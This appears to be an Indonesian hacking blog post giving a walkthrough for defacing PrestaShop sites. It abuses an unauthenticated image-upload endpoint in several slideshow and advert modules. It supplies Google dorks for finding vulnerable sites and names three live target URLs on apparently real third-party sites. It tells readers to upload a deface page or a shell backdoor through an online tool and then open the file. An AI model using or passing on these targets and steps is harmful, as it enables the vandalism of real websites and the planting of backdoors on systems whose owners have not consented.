DEFACE RESPONSIVE PRESTASHOP WITH CSRF

ArdhyanXTzy
ArdhyanXTzy
Agustus 25, 2021
0


Assalamualaikum, kembali lgi bersama gw ArdhyanX, kali ini gw mau share, kpd kalian, "deface responsive prestashop with csrf" 

Oke lgsg saja kita mulai 

Bahan - bahan yng di perlukan :

Dork: inurl:/modules/simpleslideshow/ inurl:/modules/productpageadverts/ inurl:/modules/columnadverts/ inurl:/modules/homepageadvertise/ 

kembangin lgi ya broh

Tools csrf Online, Kalian bisa search di google, soalnya ada banyak 

Exploit: /uploadimage.php Exploit jika sudah upload:/slides/nama script deface anda

LIve target 

http://www.skybrands.com.np/modules/simpleslideshow/uploadimage.php

http://plantasygambas.com/modules/columnadverts/uploadimage.php http://www.sfcosmetics.it/modules/homepageadvertise/uploadimage.php

Cara akses http/targetluhl/modules/columnadverts/slides/-.namascdepesluh

-

Oke... Pertama kalian ngedork dulu, klw bisa pake live Target aja, biar gak lama, pilih aja salah satu live Target yang udh gw sediain :)

Contoh web Vuln nya seperti ini 


Udh kan ? Oke Lanjut skrg kita pergi ke csrf Online, kalian salin web Vuln nya, beserta Exploit Nya, contohnya seperti ini 

Jika udh kalian bisa click "lock target" Jika udh, kalian bisa lgsg Upload SC Deface Kalian, atau Shell backdoor kalian bila perlu


Udh kan sayang ? Jika berhasil upload makan akan hasilnya seperti ini


Langkah yang terakhir, kalian bisa akses dengan cara sebagai berikut :

http/targetluhl/modules/columnadverts/slides/-.sckamu

Gmn, udh bisa ? Omklh mungkin sekian dulu dari gw...

Bay :)

ArdhyanXTzy

ArdhyanXTzy

Just A Beginner Who Wants To Be A Master

Posting Komentar

0 Komentar
Posting Komentar (0)